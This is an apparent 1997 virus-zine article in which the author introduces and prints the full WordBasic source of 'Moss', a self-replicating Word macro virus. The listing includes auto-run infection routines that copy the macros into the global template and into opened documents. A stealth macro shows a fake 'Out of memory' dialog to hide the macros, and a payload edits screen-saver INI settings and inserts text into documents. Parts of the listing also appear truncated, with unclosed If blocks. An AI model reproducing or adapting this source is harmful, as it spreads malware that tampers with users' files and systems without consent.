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SLAM3.018: WordMacro Virus Moss by DarkSide1 [SLAM]
WordMacro Moss by DarkSide1 [SLAM]
Sometimes, when i'm happy ;) and have time, i use IRC and talk with many people about virii and non-virii themes ;). I speak in spanish and english, cool ;)
On IRC i know a cool girl called Dominik (her real name). She is very funny and living in L.A. When I want a cool name for my new macrovirus i think in her nick Moss. Hey Dominik you're better than Kate Moss ;-)))
She use the following smile :o) when chat by IRC, hehehe. Of course, this macrovirus is dedicated for my blonde and pretty friend ;-)
Macrovirus Description:
- Name: Moss
- Author: DarkSide1 [SLAM]
- Origin: Lima Peru
- Date: June 1997
- Total macros: 9
- Encryption: yes
- Stealth: yes under Word english and spanish version
- Payload: yes change the marquee of Windoze you see it if the screen saver activate and Marquee is current (nice idea de NJoker)
- Size: 4218 bytes
- Destructive: no
- Other effects: shows Box and insert phrases when a document is open/close check if you work on Spanish or English Word Version.
And now the WordBasic code
=========================begin WordMacro Moss==========================
Macro : Moss
Comment : A nice idea from NJoker is display a phrase using the Marquee
this macro check what's your version language of Word, if
Spanish then change the Marquee (a screen saver of Windows95)
for a phrase in spanish else put a phrase in english.
Declare Function GetWindowsDirectoryA Lib "Kernel32"(lpBuffer As String, nSize As Long) As Long
me$ = "DarkSide1"
Windir$ = String$(255, " ") : nSize = 255
WordLong = GetWindowsDirectoryA(WinDir$, nSize)
IniName$ = windir$ + "\" + "CONTROL.INI"
ver$ = AppInfo$(16)
ver$ = Left$(ver$, 7)
If ver$ = "Espa§ol" Then
greeting$ = "Saludos de Moss ;o) " + me$
greeting$ = "Greetings from Moss ;o) " + me$
filescr$ = Windir$ + "\SYSTEM\MARQUEE.SCR"
fileini$ = Windir$ + "\SYSTEM.INI"
SetPrivateProfileString "HKEY_CURRENT_USER\Control Panel\desktop", "ScreenSaveTimeOut", "60", ""
SetPrivateProfileString "HKEY_CURRENT_USER\Control Panel\desktop", "ScreenSaveActive", "60", ""
SetPrivateProfileString "Screen Saver.Marquee", "Text", greeting$, IniName$
SetPrivateProfileString "boot", "SCRNSAVE.EXE", filescr$, fileini$
End Sub
Macro : Stealth
Comment : work under Work Spanish and English language version
this macro is called by HerramMacro and ToolsMacro
On Error Goto Mossops
Dim ComboBox1$(0)
ComboBox1$(0) = ""
Dim ListBox1$(0)
ListBox1$(0) = ""
Dim DropListBox2$(0)
a$ = AppInfo$(16)
a$ = Left$(a$, 7)
If a$ = "Espa§ol" Then
T$ = "Macros"
B$ = "Falta de Memoria"
C$ = "WordBasic Err = 7"
DropListBox2$(0) = " (Plantilla Global)"
Xa$ = "G&rabar..."
Xb$ = "&Ejecutar"
Xc$ = "&Crear"
Xd$ = "&Borrar"
Xe$ = "&Organizador..."
Xf$ = "M&acros disponibles en:"
Xg$ = "Descripci¢n:"
Xh$ = "&Nombre de la Macro:"
ElseIf a$ = "English" Then
T$ = "Macro"
B$ = "Out of memory."
C$ = "WordBasic Err = 7"
DropListBox2$(0) = " (Global Template)"
Xa$ = "Rec&ord..."
Xb$ = "&Run"
Xc$ = "&Create"
Xd$ = "&Delete"
Xe$ = "Or&ganizer..."
Xf$ = "Macros &Available In:"
Xg$ = "Description:"
Xh$ = "&Macro Name:"
Begin Dialog UserDialog 442, 320, T$
CancelButton 290, 38, 141, 21
PushButton 290, 14, 141, 21, Xa$, .D2
PushButton 290, 72, 141, 21, Xb$, .D3
PushButton 290, 97, 141, 21, Xc$, .D4
PushButton 290, 125, 141, 21, Xd$, .D5
PushButton 290, 161, 141, 21, Xe$, .D6
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
Text 6, 223, 193, 13, Xf$, .T1
Text 7, 259, 109, 13, Xg$, .T2
Text 7, 7, 193, 13, Xh$, .T3
ListBox 7, 276, 425, 38, ListBox1$(), .LB1
DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2
End Dialog
Redim dlg As UserDialog
x = Dialog(dlg)
If x = 0 Then
MsgBox B$, C$, 48
End Sub
Macro : AutoExec
REM DarkSide1 is a MacroVirus Writer/Research
REM from Per£ - South America
REM :o) Greetings from Moss ;o)
End Sub
Macro : AutoOpen
Comment : First check if already exist else spread when a document is
open and if the conditional random is true then show messages
only if you work under Word English or Spanish Version.
' WM.Moss dedicated to a blonde and pretty woman from L.A.
' oe Dominik :o) I thinking about you! :o)
' (c)June 24th 1997 by DarkSide1 [SLAM] in Lima Peru
End Sub
Sub mossrun
On Error Goto Mossout
N$ = FileName$()
M$ = "Macro"
A$ = ":Auto"
P$ = "Open"
C$ = "Close"
E$ = "Exec"
S1$ = ":Herram"
E1$ = ":Tools"
G$ = "Global"
Ds$ = "DarkSide1 :o)"
M1$ = ":Moss"
M2$ = ":Stealth"
M3$ = A$ + P$
M4$ = A$ + C$
M5$ = A$ + E$
M6$ = S1$ + M$
M7$ = ":ArchivoPlantillas"
M8$ = E1$ + M$
M9$ = ":FileTemplates"
mosslove = CountMacros(0)
mosshere = 0
If mosslove > 0 Then
For i = 1 To mosslove
If MacroName$(i, 0) = "Moss" Then
mosshere = 1
End If
End If
If mosshere = 0 Then
MacroCopy N$ + M1$, G$ + M1$, 1
MacroCopy N$ + M2$, G$ + M2$, 1
MacroCopy N$ + M3$, G$ + M3$, 1
MacroCopy N$ + M4$, G$ + M4$, 1
MacroCopy N$ + M5$, G$ + M5$, 1
MacroCopy N$ + M6$, G$ + M6$, 1
MacroCopy N$ + M7$, G$ + M7$, 1
MacroCopy N$ + M8$, G$ + M8$, 1
MacroCopy N$ + M9$, G$ + M9$, 1
mosslove = CountMacros(1)
mosshere = 0
If mosslove > 0 Then
For i = 1 To mosslove
If MacroName$(i, 1) = "Moss" Then
mosshere = 1
End If
End If
If mosshere = 0 Then
FileSaveAs .Name = N$, .Format = 1
MacroCopy G$ + M1$, N$ + M1$, 1
MacroCopy G$ + M2$, N$ + M2$, 1
MacroCopy G$ + M3$, N$ + M3$, 1
MacroCopy G$ + M4$, N$ + M4$, 1
MacroCopy G$ + M5$, N$ + M5$, 1
MacroCopy G$ + M6$, N$ + M6$, 1
MacroCopy G$ + M7$, N$ + M7$, 1
MacroCopy G$ + M8$, N$ + M8$, 1
MacroCopy G$ + M9$, N$ + M9$, 1
End If
End If
If Rnd() < 0.2 Then
ver$ = AppInfo$(16)
ver$ = Left$(ver$, 7)
If ver$ = "Espa§ol" Then
MsgBox " de Moss y " + Ds$, "Saludos!!!", 32
ElseIf a$ = "English" Then
MsgBox " from Moss and " + Ds$, "Greetings!!!", 32
If Rnd() < 0.3 Then
End If
End Sub
Macro : AutoClose
Comment : Insert by random a phrase when you close the document
On Error Goto Mossbye
If Rnd() < 0.3 Then
ver$ = AppInfo$(16)
ver$ = Left$(ver$, 7)
If ver$ = "Espa§ol" Then
Insert " :o) La flaquis de MOSS :o)"
ElseIf a$ = "English" Then
Insert " :o) I'm so happy with MOSS :o)"
End Sub
Macro : ToolsMacro
Call Stealth
End Sub
Macro : HerramMacro
Comment: same macro like ToolsMacro for Word Spanish Version
Call Stealth
End Sub
Macro : FileTemplates
z$ = AppInfo$(2) : z$ = Left$(z$, 1) : z = Val(z$)
If z = 7 Then
Call Moss
End Sub
Macro : ArchivoPlantillas
Comment: same macro like FileTemplates for Word Spanish Version
z$ = AppInfo$(2) : z$ = Left$(z$, 1) : z = Val(z$)
If z = 7 Then
Call Moss
End Sub
===========================end WordMacro Moss==========================